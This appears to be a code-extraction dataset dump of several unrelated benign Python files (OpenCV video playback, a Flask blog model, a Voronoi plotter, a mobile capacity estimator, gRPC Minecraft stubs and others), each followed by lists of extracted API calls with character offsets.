isTrue, frame = capture.read()
cv.imshow('video', frame)
if cv.waitKey(20) &0xFF==ord('d'):
break
capture.release()
cv.destroyAllWindows()
|
[
"cv2.VideoCapture",
"cv2.destroyAllWindows",
"cv2.imshow",
"cv2.waitKey"
] |
[((28, 87), 'cv2.VideoCapture', 'cv.VideoCapture', (['"""opencv_practicas/VID_20200312_162550.mp4"""'], {}), "('opencv_practicas/VID_20200312_162550.mp4')\n", (43, 87), True, 'import cv2 as cv\n'), ((241, 263), 'cv2.destroyAllWindows', 'cv.destroyAllWindows', ([], {}), '()\n', (261, 263), True, 'import cv2 as cv\n'), ((142, 167), 'cv2.imshow', 'cv.imshow', (['"""video"""', 'frame'], {}), "('video', frame)\n", (151, 167), True, 'import cv2 as cv\n'), ((176, 190), 'cv2.waitKey', 'cv.waitKey', (['(20)'], {}), '(20)\n', (186, 190), True, 'import cv2 as cv\n')]
|
import preprocess_directory
import unittest
FIXTURES_DIRECTORY_PATH = "Fixtures"
class TestGetImages(unittest.TestCase):
"""
Class for test function below for the get_all_images function from the preprocess_directory.py file
"""
def test_check_file(self):
"""
Test for the get_all_images function from the preprocess_directory.py file, verifying images are in the file.
"""
result = preprocess_directory.get_all_images(FIXTURES_DIRECTORY_PATH)
self.assertEqual(1, len(result))
self.assertTrue("test2.jpg" in result[0])
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"preprocess_directory.get_all_images"
] |
[((617, 632), 'unittest.main', 'unittest.main', ([], {}), '()\n', (630, 632), False, 'import unittest\n'), ((432, 492), 'preprocess_directory.get_all_images', 'preprocess_directory.get_all_images', (['FIXTURES_DIRECTORY_PATH'], {}), '(FIXTURES_DIRECTORY_PATH)\n', (467, 492), False, 'import preprocess_directory\n')]
|
import logging
import requests
import json
import azure.functions as func
def main(req: func.HttpRequest, config: str) -> func.HttpResponse:
configuration = json.loads(config)
response = requests.get(configuration["websiteUrl"])
logging.info("%s -> %s" % (response.url, response.reason))
return func.HttpResponse(
"%s -> %s" % (response.url, response.reason),
status_code=response.status_code
)
|
[
"azure.functions.HttpResponse",
"logging.info",
"json.loads",
"requests.get"
] |
[((168, 186), 'json.loads', 'json.loads', (['config'], {}), '(config)\n', (178, 186), False, 'import json\n'), ((203, 244), 'requests.get', 'requests.get', (["configuration['websiteUrl']"], {}), "(configuration['websiteUrl'])\n", (215, 244), False, 'import requests\n'), ((250, 308), 'logging.info', 'logging.info', (["('%s -> %s' % (response.url, response.reason))"], {}), "('%s -> %s' % (response.url, response.reason))\n", (262, 308), False, 'import logging\n'), ((321, 423), 'azure.functions.HttpResponse', 'func.HttpResponse', (["('%s -> %s' % (response.url, response.reason))"], {'status_code': 'response.status_code'}), "('%s -> %s' % (response.url, response.reason), status_code\n =response.status_code)\n", (338, 423), True, 'import azure.functions as func\n')]
|
"""Urls for the Zinnia comments"""
from django.conf.urls import url
from zinnia.urls import _
from zinnia.views.comments import CommentSuccess
urlpatterns = [
url(_(r'^success/$'),
CommentSuccess.as_view(),
name='comment_success'),
]
|
[
"zinnia.urls._",
"zinnia.views.comments.CommentSuccess.as_view"
] |
[((170, 185), 'zinnia.urls._', '_', (['"""^success/$"""'], {}), "('^success/$')\n", (171, 185), False, 'from zinnia.urls import _\n'), ((196, 220), 'zinnia.views.comments.CommentSuccess.as_view', 'CommentSuccess.as_view', ([], {}), '()\n', (218, 220), False, 'from zinnia.views.comments import CommentSuccess\n')]
|
'''
Defines database models.
'''
from flask_login import UserMixin
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.sql import func
from hashids import Hashids
import bcrypt
from blog.helpers import is_username, is_email, is_password, in_database
from blog import app
db = SQLAlchemy(app)
class User(db.Model, UserMixin):
'''
Model that represents users in the database.
'''
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(32), unique=True)
email = db.Column(db.String(320), unique=True)
password = db.Column(db.String(60))
posts = db.relationship('Post')
comments = db.relationship('Comment')
class Post(db.Model):
'''
Model that represents user's posts in the database.
'''
id = db.Column(db.Integer, primary_key=True)
date = db.Column(db.DateTime(timezone=True), default=func.now())
title = db.Column(db.String(64), unique=True)
hash = db.Column(db.Text, unique=True)
content = db.Column(db.Text)
username = db.Column(db.String(32), db.ForeignKey('user.username'))
comments = db.relationship('Comment', cascade="all, delete-orphan")
class Comment(db.Model):
'''
Model that represents user's comments in the database.
'''
id = db.Column(db.Integer, primary_key=True)
date = db.Column(db.DateTime(timezone=True), default=func.now())
username = db.Column(db.String(32), db.ForeignKey('user.username'))
post_hash = db.Column(db.Text, db.ForeignKey('post.hash'))
hash = db.Column(db.Text, unique=True)
msg = db.Column(db.Text)
db.create_all()
def register(username, email, password1, password2):
'''
Creates new users & adds them to the database.
Returns the new user if given valid input.
'''
if not is_email(email):
return 'Email not valid.'
users = User.query.filter_by(email=email).all()
if len(users) != 0:
return 'Email already taken.'
if not is_username(username):
return 'Username not valid.'
users = User.query.filter_by(username=username).all()
if len(users) != 0:
return 'Username already taken.'
if not is_password(password1):
return 'Password not valid.'
if password1 != password2:
return 'Passwords do not match.'
user = User(
username=username,
email=email,
password=bcrypt.hashpw(password1.encode('utf-8'), bcrypt.gensalt())
)
db.session.add(user)
db.session.commit()
return user
def login(email, password):
'''
Takes email & password to see if a user with those credentials
exists in the database.
Returns the user if they exist in the database.
'''
user = User.query.filter_by(email=email).first()
if user is None:
return None
if not bcrypt.checkpw(password.encode('utf-8'), user.password):
return None
return user
def post(user, title, content):
'''
Creates a new post by user with given title & content.
Returns the new post if given a valid title & content.
'''
if not in_database(User, user):
return None
if len(title) > 64 or len(title) < 3:
return None
existing_post = Post.query.filter_by(title=title.title()).first()
if existing_post:
return None
new_post = Post(
username=user.username,
title=title.title(),
content=content
)
db.session.add(new_post)
db.session.commit()
hashids = Hashids(min_length=5, salt=app.config['SECRET_KEY'])
new_post.hash = hashids.encode(new_post.id) + 'P'
db.session.commit()
return new_post
def comment(user, post, msg):
'''
Creates comment by user on post.
Returns the new comment if passed a real post and valid message.
'''
if not in_database(User, user) or not in_database(Post, post):
return None
if len(msg) < 2:
return None
comment = Comment(
username=user.username,
post_hash=post.hash,
msg=msg
)
db.session.add(comment)
db.session.commit()
hashids = Hashids(min_length=5, salt=app.config['SECRET_KEY'])
comment.hash = hashids.encode(comment.id) + 'C'
db.session.commit()
return comment
def delete(item):
'''
Delete entry in database table
'''
db.session.delete(item)
db.session.commit()
|
[
"blog.helpers.in_database",
"sqlalchemy.sql.func.now",
"bcrypt.gensalt",
"blog.helpers.is_email",
"hashids.Hashids",
"flask_sqlalchemy.SQLAlchemy",
"blog.helpers.is_username",
"blog.helpers.is_password"
] |
[((283, 298), 'flask_sqlalchemy.SQLAlchemy', 'SQLAlchemy', (['app'], {}), '(app)\n', (293, 298), False, 'from flask_sqlalchemy import SQLAlchemy\n'), ((3467, 3519), 'hashids.Hashids', 'Hashids', ([], {'min_length': '(5)', 'salt': "app.config['SECRET_KEY']"}), "(min_length=5, salt=app.config['SECRET_KEY'])\n", (3474, 3519), False, 'from hashids import Hashids\n'), ((4074, 4126), 'hashids.Hashids', 'Hashids', ([], {'min_length': '(5)', 'salt': "app.config['SECRET_KEY']"}), "(min_length=5, salt=app.config['SECRET_KEY'])\n", (4081, 4126), False, 'from hashids import Hashids\n'), ((1779, 1794), 'blog.helpers.is_email', 'is_email', (['email'], {}), '(email)\n', (1787, 1794), False, 'from blog.helpers import is_username, is_email, is_password, in_database\n'), ((1955, 1976), 'blog.helpers.is_username', 'is_username', (['username'], {}), '(username)\n', (1966, 1976), False, 'from blog.helpers import is_username, is_email, is_password, in_database\n'), ((2149, 2171), 'blog.helpers.is_password', 'is_password', (['password1'], {}), '(password1)\n', (2160, 2171), False, 'from blog.helpers import is_username, is_email, is_password, in_database\n'), ((3066, 3089), 'blog.helpers.in_database', 'in_database', (['User', 'user'], {}), '(User, user)\n', (3077, 3089), False, 'from blog.helpers import is_username, is_email, is_password, in_database\n'), ((872, 882), 'sqlalchemy.sql.func.now', 'func.now', ([], {}), '()\n', (880, 882), False, 'from sqlalchemy.sql import func\n'), ((1362, 1372), 'sqlalchemy.sql.func.now', 'func.now', ([], {}), '()\n', (1370, 1372), False, 'from sqlalchemy.sql import func\n'), ((3783, 3806), 'blog.helpers.in_database', 'in_database', (['User', 'user'], {}), '(User, user)\n', (3794, 3806), False, 'from blog.helpers import is_username, is_email, is_password, in_database\n'), ((3814, 3837), 'blog.helpers.in_database', 'in_database', (['Post', 'post'], {}), '(Post, post)\n', (3825, 3837), False, 'from blog.helpers import is_username, is_email, is_password, in_database\n'), ((2406, 2422), 'bcrypt.gensalt', 'bcrypt.gensalt', ([], {}), '()\n', (2420, 2422), False, 'import bcrypt\n')]
|
import datetime
from .stwno_constants import CSV_MEAL_TYPE_MAP,\
CSV_NUTRITION_TYPE_MAP,\
NutritionType,\
CSV_DATE_FORMAT,\
MealType,\
NutritionType,\
STWNO_INGREDIENTS,\
STWNO_ALLERGENS
class NoValidDateStringException(Exception):
pass
class UnknownMealTypeException(Exception):
pass
class UnknownNutritionTypeException(Exception):
pass
class UnknownIngredientException(Exception):
pass
class StwnoFoodIngredient():
identifier: str
name: str
def __init__(self, identifier, name):
self.name = name
self.identifier = identifier
def convertCSVDishName(name: str) -> str:
name = name.strip()
indexBracket = name.find('(')
if indexBracket == -1:
return name
return name[0:indexBracket].strip()
def convertCSVMealType(mealType: str) -> MealType:
mealTypeID = ''.join(filter(str.isalpha, mealType))
mType = CSV_MEAL_TYPE_MAP.get(mealTypeID)
if mType != None:
return mType
else:
raise UnknownMealTypeException(
'MealType {} is not in the list of known meal types'.format(mType))
def convertCSVNutritionType(nutritionType: str) -> NutritionType:
nutType = CSV_NUTRITION_TYPE_MAP.get(nutritionType)
if nutType != None:
return nutType
else:
return NutritionType.meat
def convertCSVDate(dateStr: str) -> datetime.date:
try:
return datetime.datetime.strptime(dateStr, CSV_DATE_FORMAT).date()
except ValueError:
raise NoValidDateStringException
def convertCSVIngredientsAndAllergens(mealNameStr: str) -> str:
ingredientIdentifiers = mealNameStr.replace(' ', '').split(',')
ingredients = []
allergens = []
for identifier in ingredientIdentifiers:
name = None
if name := STWNO_INGREDIENTS.get(identifier):
ingredients.append(StwnoFoodIngredient(identifier, name))
elif name := STWNO_ALLERGENS.get(identifier):
allergens.append(StwnoFoodIngredient(identifier, name))
else:
raise UnknownIngredientException(
'Ingredient {} is neither a known inredient nor an allergene'.format(identifier))
return ingredients, allergens
|
[
"datetime.datetime.strptime"
] |
[((1419, 1471), 'datetime.datetime.strptime', 'datetime.datetime.strptime', (['dateStr', 'CSV_DATE_FORMAT'], {}), '(dateStr, CSV_DATE_FORMAT)\n', (1445, 1471), False, 'import datetime\n')]
|
#!/usr/bin/env python3
"""Tool for plotting the Voronoi tessellation described by the provided data
Note that the seeds of the tessellation are based on the provided towers file,
not computed from the cells. The tool also prints to the console the number
of towers and number of cells. Towers without an associated cell are shown in
green, while other towers are shown in red.
"""
from matplotlib import pyplot as plt # type: ignore
from shapely.geometry import MultiPolygon # type: ignore
from descartes import PolygonPatch # type: ignore
from data_interface import(
load_voronoi_cells,
load_towers,
VORONOI_PATH,
TOWERS_PATH,
)
def plot_polygon(axes: plt.axes, polygon: MultiPolygon) -> None:
"""Add a polygon to an axes
Args:
axes: The axes to add the polygon to
polygon: The polygon to add
Returns:
None
"""
patch = PolygonPatch(polygon, facecolor=[0, 0, 0.5], edgecolor=[0, 0, 0],
alpha=0.5)
axes.add_patch(patch)
if __name__ == '__main__':
# pragma pylint: disable=invalid-name
cells = load_voronoi_cells(VORONOI_PATH)
towers = load_towers(TOWERS_PATH)
print('Number of Cells: ', len(cells), 'Number of Towers: ', len(towers))
# Learned how to plot from:
# https://chrishavlin.com/2016/11/28/shapefiles-in-python-polygons/
plt.ioff()
fig = plt.figure()
# (left, bottom, width, height) in units of fractions of figure dimensions
ax = fig.add_axes((0.1, 0.1, 0.9, 0.9))
ax.set_aspect(1)
no_coor_indices = []
for i, cell in enumerate(cells):
plot_polygon(ax, cell)
if cell.area == 0:
no_coor_indices.append(i)
for i, (lat, lng) in enumerate(towers):
color = 'red'
if i in no_coor_indices:
color = 'green'
ax.plot(lat, lng, color=color, marker='o', markersize=2, alpha=0.5)
# Showed how to auto-resize axes: https://stackoverflow.com/a/11039268
ax.relim()
ax.autoscale_view()
plt.show()
|
[
"descartes.PolygonPatch",
"data_interface.load_voronoi_cells",
"matplotlib.pyplot.show",
"matplotlib.pyplot.ioff",
"data_interface.load_towers",
"matplotlib.pyplot.figure"
] |
[((890, 966), 'descartes.PolygonPatch', 'PolygonPatch', (['polygon'], {'facecolor': '[0, 0, 0.5]', 'edgecolor': '[0, 0, 0]', 'alpha': '(0.5)'}), '(polygon, facecolor=[0, 0, 0.5], edgecolor=[0, 0, 0], alpha=0.5)\n', (902, 966), False, 'from descartes import PolygonPatch\n'), ((1101, 1133), 'data_interface.load_voronoi_cells', 'load_voronoi_cells', (['VORONOI_PATH'], {}), '(VORONOI_PATH)\n', (1119, 1133), False, 'from data_interface import load_voronoi_cells, load_towers, VORONOI_PATH, TOWERS_PATH\n'), ((1147, 1171), 'data_interface.load_towers', 'load_towers', (['TOWERS_PATH'], {}), '(TOWERS_PATH)\n', (1158, 1171), False, 'from data_interface import load_voronoi_cells, load_towers, VORONOI_PATH, TOWERS_PATH\n'), ((1359, 1369), 'matplotlib.pyplot.ioff', 'plt.ioff', ([], {}), '()\n', (1367, 1369), True, 'from matplotlib import pyplot as plt\n'), ((1381, 1393), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1391, 1393), True, 'from matplotlib import pyplot as plt\n'), ((2020, 2030), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2028, 2030), True, 'from matplotlib import pyplot as plt\n')]
|
from setuptools import setup
setup(name = 'infupy',
version = '2022.1.11',
description = 'Syringe pump infusion',
url = 'https://github.com/jaj42/infupy',
author = '<NAME>',
author_email = '<EMAIL>',
license = 'ISC',
packages = ['infupy', 'infupy.backends', 'infupy.gui'],
install_requires=[
'pyserial',
'crcmod',
'qtpy'
],
scripts = [
'scripts/syre.pyw'
]
)
|
[
"setuptools.setup"
] |
[((30, 354), 'setuptools.setup', 'setup', ([], {'name': '"""infupy"""', 'version': '"""2022.1.11"""', 'description': '"""Syringe pump infusion"""', 'url': '"""https://github.com/jaj42/infupy"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'license': '"""ISC"""', 'packages': "['infupy', 'infupy.backends', 'infupy.gui']", 'install_requires': "['pyserial', 'crcmod', 'qtpy']", 'scripts': "['scripts/syre.pyw']"}), "(name='infupy', version='2022.1.11', description=\n 'Syringe pump infusion', url='https://github.com/jaj42/infupy', author=\n '<NAME>', author_email='<EMAIL>', license='ISC', packages=['infupy',\n 'infupy.backends', 'infupy.gui'], install_requires=['pyserial',\n 'crcmod', 'qtpy'], scripts=['scripts/syre.pyw'])\n", (35, 354), False, 'from setuptools import setup\n')]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, division, print_function, absolute_import
import sys
import platform
import argparse
import os
from pyt import tester, __version__, main
from pyt.compat import *
def console():
# ripped from unittest.__main__.py
if sys.argv[0].endswith("__main__.py"):
executable = os.path.basename(sys.executable)
sys.argv[0] = executable + " -m pyt"
if is_py2:
from unittest.main import USAGE_AS_MAIN
main.USAGE = USAGE_AS_MAIN
main(module=None)
if __name__ == "__main__":
# allow both imports of this module, for entry_points, and also running this module using python -m pyt
console()
|
[
"pyt.main",
"os.path.basename"
] |
[((553, 570), 'pyt.main', 'main', ([], {'module': 'None'}), '(module=None)\n', (557, 570), False, 'from pyt import tester, __version__, main\n'), ((371, 403), 'os.path.basename', 'os.path.basename', (['sys.executable'], {}), '(sys.executable)\n', (387, 403), False, 'import os\n')]
|
"""
Capacity estimation method.
Written by <NAME>
December 12th 2019
This method can be used for any spatially aggregated unit, such as
postcode sectors or local authority districts. First, a points in
polygon analysis needs to provide the total number of 4G or 5G sites
in an area, in order to then get the density of assets. This method
then allocates the estimated capacity to the area.
"""
import os
import sys
import configparser
import csv
from itertools import tee
from collections import OrderedDict
CONFIG = configparser.ConfigParser()
CONFIG.read(os.path.join(os.path.dirname(__file__), 'script_config.ini'))
BASE_PATH = CONFIG['file_locations']['base_path']
DATA_RAW = os.path.join(BASE_PATH, 'raw')
DATA_INTERMEDIATE = os.path.join(BASE_PATH, 'intermediate')
def load_capacity_lookup_table(path):
"""
Load a lookup table created using pysim5G:
https://github.com/edwardoughton/pysim5g
"""
capacity_lookup_table = {}
# for path in PATH_LIST:
with open(path, 'r') as capacity_lookup_file:
reader = csv.DictReader(capacity_lookup_file)
for row in reader:
if float(row["capacity_mbps_km2"]) <= 0:
continue
environment = row["environment"].lower()
cell_type = row["ant_type"]
frequency = str(int(float(row["frequency_GHz"]) * 1e3))
bandwidth = str(row["bandwidth_MHz"])
generation = str(row["generation"])
density = float(row["sites_per_km2"])
capacity = float(row["capacity_mbps_km2"])
if (environment, cell_type, frequency, bandwidth, generation) \
not in capacity_lookup_table:
capacity_lookup_table[(
environment, cell_type, frequency, bandwidth, generation)
] = []
capacity_lookup_table[(
environment, cell_type, frequency, bandwidth, generation
)].append((
density, capacity
))
for key, value_list in capacity_lookup_table.items():
value_list.sort(key=lambda tup: tup[0])
return capacity_lookup_table
def estimate_area_capacity(assets, area, clutter_environment,
capacity_lookup_table, simulation_parameters):
"""
Find the macrocellular Radio Access Network capacity given the
area assets and deployed frequency bands.
"""
capacity = 0
for frequency in ['700', '800', '1800', '2600', '3500', '26000']:
unique_sites = set()
for asset in assets:
for asset_frequency in asset['frequency']:
if asset_frequency == frequency:
unique_sites.add(asset['site_ngr'])
site_density = float(len(unique_sites)) / area
bandwidth = find_frequency_bandwidth(frequency,
simulation_parameters)
if frequency == '700' or frequency == '3500' or frequency == '26000':
generation = '5G'
else:
generation = '4G'
if site_density > 0:
tech_capacity = lookup_capacity(
capacity_lookup_table,
clutter_environment,
'macro',
str(frequency),
str(bandwidth),
generation,
site_density,
)
else:
tech_capacity = 0
capacity += tech_capacity
return capacity
def find_frequency_bandwidth(frequency, simulation_parameters):
"""
Finds the correct bandwidth for a specific frequency from the
simulation parameters.
"""
simulation_parameter = 'channel_bandwidth_{}'.format(frequency)
if simulation_parameter not in simulation_parameters.keys():
KeyError('{} not specified in simulation_parameters'.format(frequency))
bandwidth = simulation_parameters[simulation_parameter]
return bandwidth
def pairwise(iterable):
"""
Return iterable of 2-tuples in a sliding window.
>>> list(pairwise([1,2,3,4]))
[(1,2),(2,3),(3,4)]
"""
a, b = tee(iterable)
next(b, None)
return zip(a, b)
def lookup_capacity(lookup_table, environment, cell_type, frequency, bandwidth,
generation, site_density):
"""
Use lookup table to find capacity by clutter environment geotype,
frequency, bandwidth, technology generation and site density.
"""
# print(lookup_table)
if (environment, cell_type, frequency, bandwidth, generation) not in lookup_table:
raise KeyError("Combination %s not found in lookup table",
(environment, cell_type, frequency, bandwidth, generation))
density_capacities = lookup_table[
(environment, cell_type, frequency, bandwidth, generation)
]
lowest_density, lowest_capacity = density_capacities[0]
if site_density < lowest_density:
return 0
for a, b in pairwise(density_capacities):
lower_density, lower_capacity = a
upper_density, upper_capacity = b
if lower_density <= site_density and site_density < upper_density:
result = interpolate(
lower_density, lower_capacity,
upper_density, upper_capacity,
site_density
)
return result
# If not caught between bounds return highest capacity
highest_density, highest_capacity = density_capacities[-1]
return highest_capacity
def interpolate(x0, y0, x1, y1, x):
"""
Linear interpolation between two values.
"""
y = (y0 * (x1 - x) + y1 * (x - x0)) / (x1 - x0)
return y
if __name__ == '__main__':
#define parameters
PARAMETERS = {
'channel_bandwidth_700': '10',
'channel_bandwidth_800': '10',
'channel_bandwidth_1800': '10',
'channel_bandwidth_2600': '10',
'channel_bandwidth_3500': '40',
'channel_bandwidth_3700': '40',
'channel_bandwidth_26000': '200',
'macro_sectors': 3,
'small-cell_sectors': 1,
'mast_height': 30,
}
#define assets
ASSETS = [
{
'site_ngr': 'A',
'frequency': ['800', '2600'],
'technology': '4G',
'type': 'macrocell_site',
'bandwidth': '2x10MHz',
'build_date': 2018,
},
{
'site_ngr': 'B',
'frequency': ['800', '2600'],
'technology': '4G',
'type': 'macrocell_site',
'bandwidth': '2x10MHz',
'build_date': 2018,
},
]
path = os.path.join(DATA_RAW, 'capacity_lut_by_frequency_10.csv')
capacity_lookup_table = load_capacity_lookup_table(path)
area_capacity = estimate_area_capacity(ASSETS, 10, 'urban',
capacity_lookup_table, PARAMETERS)
print(area_capacity)
|
[
"csv.DictReader",
"os.path.dirname",
"itertools.tee",
"configparser.ConfigParser",
"os.path.join"
] |
[((523, 550), 'configparser.ConfigParser', 'configparser.ConfigParser', ([], {}), '()\n', (548, 550), False, 'import configparser\n'), ((687, 717), 'os.path.join', 'os.path.join', (['BASE_PATH', '"""raw"""'], {}), "(BASE_PATH, 'raw')\n", (699, 717), False, 'import os\n'), ((738, 777), 'os.path.join', 'os.path.join', (['BASE_PATH', '"""intermediate"""'], {}), "(BASE_PATH, 'intermediate')\n", (750, 777), False, 'import os\n'), ((4077, 4090), 'itertools.tee', 'tee', (['iterable'], {}), '(iterable)\n', (4080, 4090), False, 'from itertools import tee\n'), ((6570, 6628), 'os.path.join', 'os.path.join', (['DATA_RAW', '"""capacity_lut_by_frequency_10.csv"""'], {}), "(DATA_RAW, 'capacity_lut_by_frequency_10.csv')\n", (6582, 6628), False, 'import os\n'), ((576, 601), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (591, 601), False, 'import os\n'), ((1055, 1091), 'csv.DictReader', 'csv.DictReader', (['capacity_lookup_file'], {}), '(capacity_lookup_file)\n', (1069, 1091), False, 'import csv\n')]
|
import serial
import struct
rf_channel_list = [b"\x01", b"\x02", b"\x03", b"\x04"]
def send_rf_command(config_class, channel, is_study = False):
ser = serial.Serial(
port = config_class.tty,
baudrate = 9600,
parity = serial.PARITY_NONE,
stopbits = serial.STOPBITS_ONE,
bytesize = serial.EIGHTBITS
)
ser.flushInput()
ser.flushOutput()
if is_study:
data = b"\xAA"
else:
data = b"\xBB"
data += rf_channel_list[channel]
data += b"\xFF"
ser.write(data)
ser.flushInput()
ser.flushOutput()
ser.close()
|
[
"serial.Serial"
] |
[((157, 297), 'serial.Serial', 'serial.Serial', ([], {'port': 'config_class.tty', 'baudrate': '(9600)', 'parity': 'serial.PARITY_NONE', 'stopbits': 'serial.STOPBITS_ONE', 'bytesize': 'serial.EIGHTBITS'}), '(port=config_class.tty, baudrate=9600, parity=serial.\n PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS)\n', (170, 297), False, 'import serial\n')]
|
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from google.protobuf import empty_pb2 as google_dot_protobuf_dot_empty__pb2
import test_evocraft_py.minecraft_pb2 as minecraft__pb2
class MinecraftServiceStub(object):
"""*
The main service.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.spawnBlocks = channel.unary_unary(
'/dk.itu.real.ooe.MinecraftService/spawnBlocks',
request_serializer=minecraft__pb2.Blocks.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
self.readCube = channel.unary_unary(
'/dk.itu.real.ooe.MinecraftService/readCube',
request_serializer=minecraft__pb2.Cube.SerializeToString,
response_deserializer=minecraft__pb2.Blocks.FromString,
)
self.fillCube = channel.unary_unary(
'/dk.itu.real.ooe.MinecraftService/fillCube',
request_serializer=minecraft__pb2.FillCubeRequest.SerializeToString,
response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class MinecraftServiceServicer(object):
"""*
The main service.
"""
def spawnBlocks(self, request, context):
"""* Spawn multiple blocks.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def readCube(self, request, context):
"""* Return all blocks in a cube
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def fillCube(self, request, context):
"""* Fill a cube with a block type
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_MinecraftServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'spawnBlocks': grpc.unary_unary_rpc_method_handler(
servicer.spawnBlocks,
request_deserializer=minecraft__pb2.Blocks.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'readCube': grpc.unary_unary_rpc_method_handler(
servicer.readCube,
request_deserializer=minecraft__pb2.Cube.FromString,
response_serializer=minecraft__pb2.Blocks.SerializeToString,
),
'fillCube': grpc.unary_unary_rpc_method_handler(
servicer.fillCube,
request_deserializer=minecraft__pb2.FillCubeRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'dk.itu.real.ooe.MinecraftService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class MinecraftService(object):
"""*
The main service.
"""
@staticmethod
def spawnBlocks(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dk.itu.real.ooe.MinecraftService/spawnBlocks',
minecraft__pb2.Blocks.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def readCube(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dk.itu.real.ooe.MinecraftService/readCube',
minecraft__pb2.Cube.SerializeToString,
minecraft__pb2.Blocks.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def fillCube(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dk.itu.real.ooe.MinecraftService/fillCube',
minecraft__pb2.FillCubeRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
|
[
"grpc.method_handlers_generic_handler",
"grpc.unary_unary_rpc_method_handler",
"grpc.experimental.unary_unary"
] |
[((3232, 3329), 'grpc.method_handlers_generic_handler', 'grpc.method_handlers_generic_handler', (['"""dk.itu.real.ooe.MinecraftService"""', 'rpc_method_handlers'], {}), "('dk.itu.real.ooe.MinecraftService',\n rpc_method_handlers)\n", (3268, 3329), False, 'import grpc\n'), ((2367, 2572), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.spawnBlocks'], {'request_deserializer': 'minecraft__pb2.Blocks.FromString', 'response_serializer': 'google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString'}), '(servicer.spawnBlocks,\n request_deserializer=minecraft__pb2.Blocks.FromString,\n response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.\n SerializeToString)\n', (2402, 2572), False, 'import grpc\n'), ((2660, 2838), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.readCube'], {'request_deserializer': 'minecraft__pb2.Cube.FromString', 'response_serializer': 'minecraft__pb2.Blocks.SerializeToString'}), '(servicer.readCube, request_deserializer\n =minecraft__pb2.Cube.FromString, response_serializer=minecraft__pb2.\n Blocks.SerializeToString)\n', (2695, 2838), False, 'import grpc\n'), ((2929, 3137), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.fillCube'], {'request_deserializer': 'minecraft__pb2.FillCubeRequest.FromString', 'response_serializer': 'google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString'}), '(servicer.fillCube, request_deserializer\n =minecraft__pb2.FillCubeRequest.FromString, response_serializer=\n google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString)\n', (2964, 3137), False, 'import grpc\n'), ((3839, 4151), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/dk.itu.real.ooe.MinecraftService/spawnBlocks"""', 'minecraft__pb2.Blocks.SerializeToString', 'google_dot_protobuf_dot_empty__pb2.Empty.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/dk.itu.real.ooe.MinecraftService/spawnBlocks', minecraft__pb2.Blocks.\n SerializeToString, google_dot_protobuf_dot_empty__pb2.Empty.FromString,\n options, channel_credentials, insecure, call_credentials, compression,\n wait_for_ready, timeout, metadata)\n", (3868, 4151), False, 'import grpc\n'), ((4505, 4793), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/dk.itu.real.ooe.MinecraftService/readCube"""', 'minecraft__pb2.Cube.SerializeToString', 'minecraft__pb2.Blocks.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/dk.itu.real.ooe.MinecraftService/readCube', minecraft__pb2.Cube.\n SerializeToString, minecraft__pb2.Blocks.FromString, options,\n channel_credentials, insecure, call_credentials, compression,\n wait_for_ready, timeout, metadata)\n", (4534, 4793), False, 'import grpc\n'), ((5147, 5466), 